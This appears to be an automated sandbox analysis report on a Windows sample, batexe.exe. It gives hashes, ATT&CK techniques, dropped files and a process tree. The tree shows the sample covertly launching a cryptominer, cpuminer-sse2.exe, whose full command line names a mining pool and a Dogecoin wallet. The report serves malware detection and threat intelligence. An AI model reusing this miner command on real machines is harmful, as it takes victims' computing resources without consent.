73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
295s
max time network
307s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
12/02/2024, 06:14

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
1944	b2e.exe
2292	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2292	cpuminer-sse2.exe
2292	cpuminer-sse2.exe
2292	cpuminer-sse2.exe
2292	cpuminer-sse2.exe
2292	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4532-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4532 wrote to memory of 1944	4532	batexe.exe	79
PID 4532 wrote to memory of 1944	4532	batexe.exe	79
PID 4532 wrote to memory of 1944	4532	batexe.exe	79
PID 1944 wrote to memory of 3240	1944	b2e.exe	86
PID 1944 wrote to memory of 3240	1944	b2e.exe	86
PID 1944 wrote to memory of 3240	1944	b2e.exe	86
PID 3240 wrote to memory of 2292	3240	cmd.exe	88
PID 3240 wrote to memory of 2292	3240	cmd.exe	88

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4532
- C:\Users\Admin\AppData\Local\Temp\99FE.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\99FE.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\99FE.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1944
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9EFF.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3240
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2292

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\99FE.tmp\b2e.exe

Filesize
592KB

MD5
4fd9dc87fe7ff261111f5c6a49e64d55

SHA1
c20a75dc52198da7d823012e4a3d7e3cddd5a46f

SHA256
66f119ea52757c0152a6050b5ed972a18a0e99ec31fdac0a18e659e86c519037

SHA512
2d37cb4793e0458f6a2a65384cf7789614e0be6f4e0b362e907d0919015ca3a6d8752d2f19a04aa1699dc7c28aa7a86280d4807fc5a74a9dd254dcb47b09f157

Download Submit
C:\Users\Admin\AppData\Local\Temp\99FE.tmp\b2e.exe

Filesize
212KB

MD5
b153a396726e4b123eacad5ee39e9cf2

SHA1
a5498db739fdddc24c317845dddc6efc3beaa3c5

SHA256
fe04a91b5f77dfb97f974e7f623ecad886041a227b1d9efde8b848dc50153f00

SHA512
8103eedde9223408b44c35cbebae23898fd3e5f09ea160a4121fb2e3d60120eb9edeb15ec60391e7f5935dfb99f9463ecf77e03232b6cb2a13d443a85ebc54a4

Download Submit
C:\Users\Admin\AppData\Local\Temp\99FE.tmp\b2e.exe

Filesize
149KB

MD5
ec473beb674821c43200567f1fdc3f16

SHA1
137db4ed52b3260007950ab8189624a704e52a16

SHA256
3b30768b6e622996bc8fcdae5c2163cd90722918128231aba8548f431f2c0f64

SHA512
7317fb0604b143edaa4776129f1e06eecf6b390ec46448733022eba0b984add3541f8eba3396ae92bbc845f7cac4ca4105af882cdf9d4dc9e5bc8e466ae77469

Download Submit
C:\Users\Admin\AppData\Local\Temp\9EFF.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
445KB

MD5
305fc935e07baecd83d92b31a9693e90

SHA1
0416bb54036924477d6ac736e714a511b19a75c8

SHA256
dd867d3b9eb186a06c5d62ee0758a86274b002968b000737f14cbe80ab579d59

SHA512
feccb3da45327037ec50283572c3ab123db102a65a6c96cd152b1e184503ae0f89c5c34ad476b457e823e9545cd0f78ffd72a6b2c38b74ecc88fb6fd198af50a

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
149KB

MD5
50f2dbeda6b31df6ba3a76b84b6e03e5

SHA1
0481a34b7674ab97eb1949bdbb5a93b2315b0a5d

SHA256
65c8c385fa9563b79fde3d46238f08f80e46920bb24936d6ab992fb89692c419

SHA512
04baf9ef021b243f240494c13ecca9d2bd63eee9a81b587a02624ac68cae6e7dad874d57a9718fc11b4abaa97deeba6da48bfdcf1b6d462dc58ab764580da032

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
113KB

MD5
efe6aa1ec22cb5342d9a7cc3e16fa6f1

SHA1
2d234d533725585d03628ecaa7770f99ae26682f

SHA256
a0efbede7919b8f669e5c45b7b5a5fc3bad9bea5eaa213d3568b97f9b5dba882

SHA512
82f871552b646a36784a1c3da5bb96fc04b4ea703894987ad4f767f8eabc2f805d05ec3674d9cf9826a9d56ec07e7da7394a28eaf738c30fe12aeb2a04427b44

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
145KB

MD5
0d6253391dc11f1c9c40a273223396e4

SHA1
761cfdbf8f9ad84741c21f5186a75df433c3781f

SHA256
2c694a6276bc1e3353dc10bab0e619b5b22572c0a6f9ef1c12da5dddff213704

SHA512
75ee811758f6913b24ced515bee021c7cc4e4b4a8e37c9e5764de0d4aa6786c6a47489c8656aa7b9d1df7c73d926a89b3a58d5a747882e8f9444a82c8b64a744

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
158KB

MD5
bf6d020136760314ad3c11d3642625f8

SHA1
62ddda8dd11093cf59265e915021cb2775b0e6f2

SHA256
6ff65beac267f4851fe7cabdf3ae524fe2dca9447ad1eba39a756945291a8d72

SHA512
68ebbd240eb0c749d7544dc74aaa1f4c179979db10c2ff60755b2e04d88520dcedb54682912907f79221c67058dc096ab76f07caf5ec03d30a28c681d6853daa

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
240KB

MD5
0411f97fc4741f9327943b42043d73d6

SHA1
186a3fbc0e4622e12f91d626941f2e4b45b53d05

SHA256
4b0c784d18811eef92eb891cabba4f298a6ff6108ae45d37dd06fdda32d372dd

SHA512
49cea94bb33f32d99b5abd1ffa23825f76a793ad333bd4f0c3c7ef19f14fe7c85e23098800e6623373b2db8880d74dfdf3aa7f5257963b11cea99ce669cc8457

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
118KB

MD5
3ccc89b8aa3755e8eaabfcad101b02b4

SHA1
322af585f45fedeb22142c7e11875a5389fb8a16

SHA256
cc3bd18b14d7231544c9a0718611afb076088c867c5c501bc00012e7e4dbca0a

SHA512
1093a659954b0a1e7feccc7d979b50b69152cd99512bd1155a44690ad3d3f76f941918763fa7e1941b5875e4078b25148291b21f33ce835ba4c04ffde81e6acb

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
325KB

MD5
3c1fd54d268ed68af5a85820b8c9df50

SHA1
ab69cebaa5168690eaf714a817698386c28b1562

SHA256
a7f91e948efbdc41606b13bf1da2238924cda58507023dd7c4edaff05c75337d

SHA512
d81e79945ed22a04a40859cd7233fe7302a9b3e20aca2ce6e33359e8b5c34ee8ab6686a44786f5a5fed416f136be53f077910716459c96eea8d989d723ea4177

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
106KB

MD5
bc3202db1c24b3b4a236ad47cd5698dc

SHA1
4a1c57d3b6703fff089ba569f4575518c1cf34e0

SHA256
e06739a136077df1d5725cf99a859a2e9094f9cfb9473211245e7c8c6c1bdd3d

SHA512
dd4b62916a91beaa35efe9a5697ac4e546bcd55ecbca4e6c1fff6e5c38b6a072faaa57985d95b375a3e7b09f5b119cd857102bac23a6c7f8c5caf1b1d45727c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
266KB

MD5
caa992356b8c5eb237e88f2c3f32d9a6

SHA1
7404a1f6e59950242c7fefbf6272b8cbac453723

SHA256
0906a9eef7aa2f3f5658db4c5411abe2f2112accdc41c5bcace8d7d411646a34

SHA512
530d5567d88189e0167f19e1302b6f89543ca97c343daf3e5de2521ac2a7d610b328fbccd121531322a29939ef931cff3350f7c625e5b34995808f38bdd00f11

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
204KB

MD5
c5ea1152bb6ab196e92557b9f324ca39

SHA1
2fa1885d48e8d7639a9cfb9014810dec946ed6c0

SHA256
039f62072d2119c0c927bdf8bb55782d8d931f41631ebd75054d38baa1f20f6b

SHA512
3cff9d11d5b8c86dc2acf8d3b370cf498b71748f22cdb05cee9c44b19966e521c622ec5c599ab446362659e2c34f71732b852534324b9e6b72bb97d2389d15bd

Download Submit
memory/1944-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1944-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2292-47-0x0000000001150000-0x0000000002A05000-memory.dmp

Filesize
24.7MB

Download
memory/2292-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2292-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2292-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2292-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2292-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2292-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2292-46-0x0000000061140000-0x00000000611D8000-memory.dmp

Filesize
608KB

Download
memory/2292-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2292-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2292-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2292-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2292-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2292-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4532-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download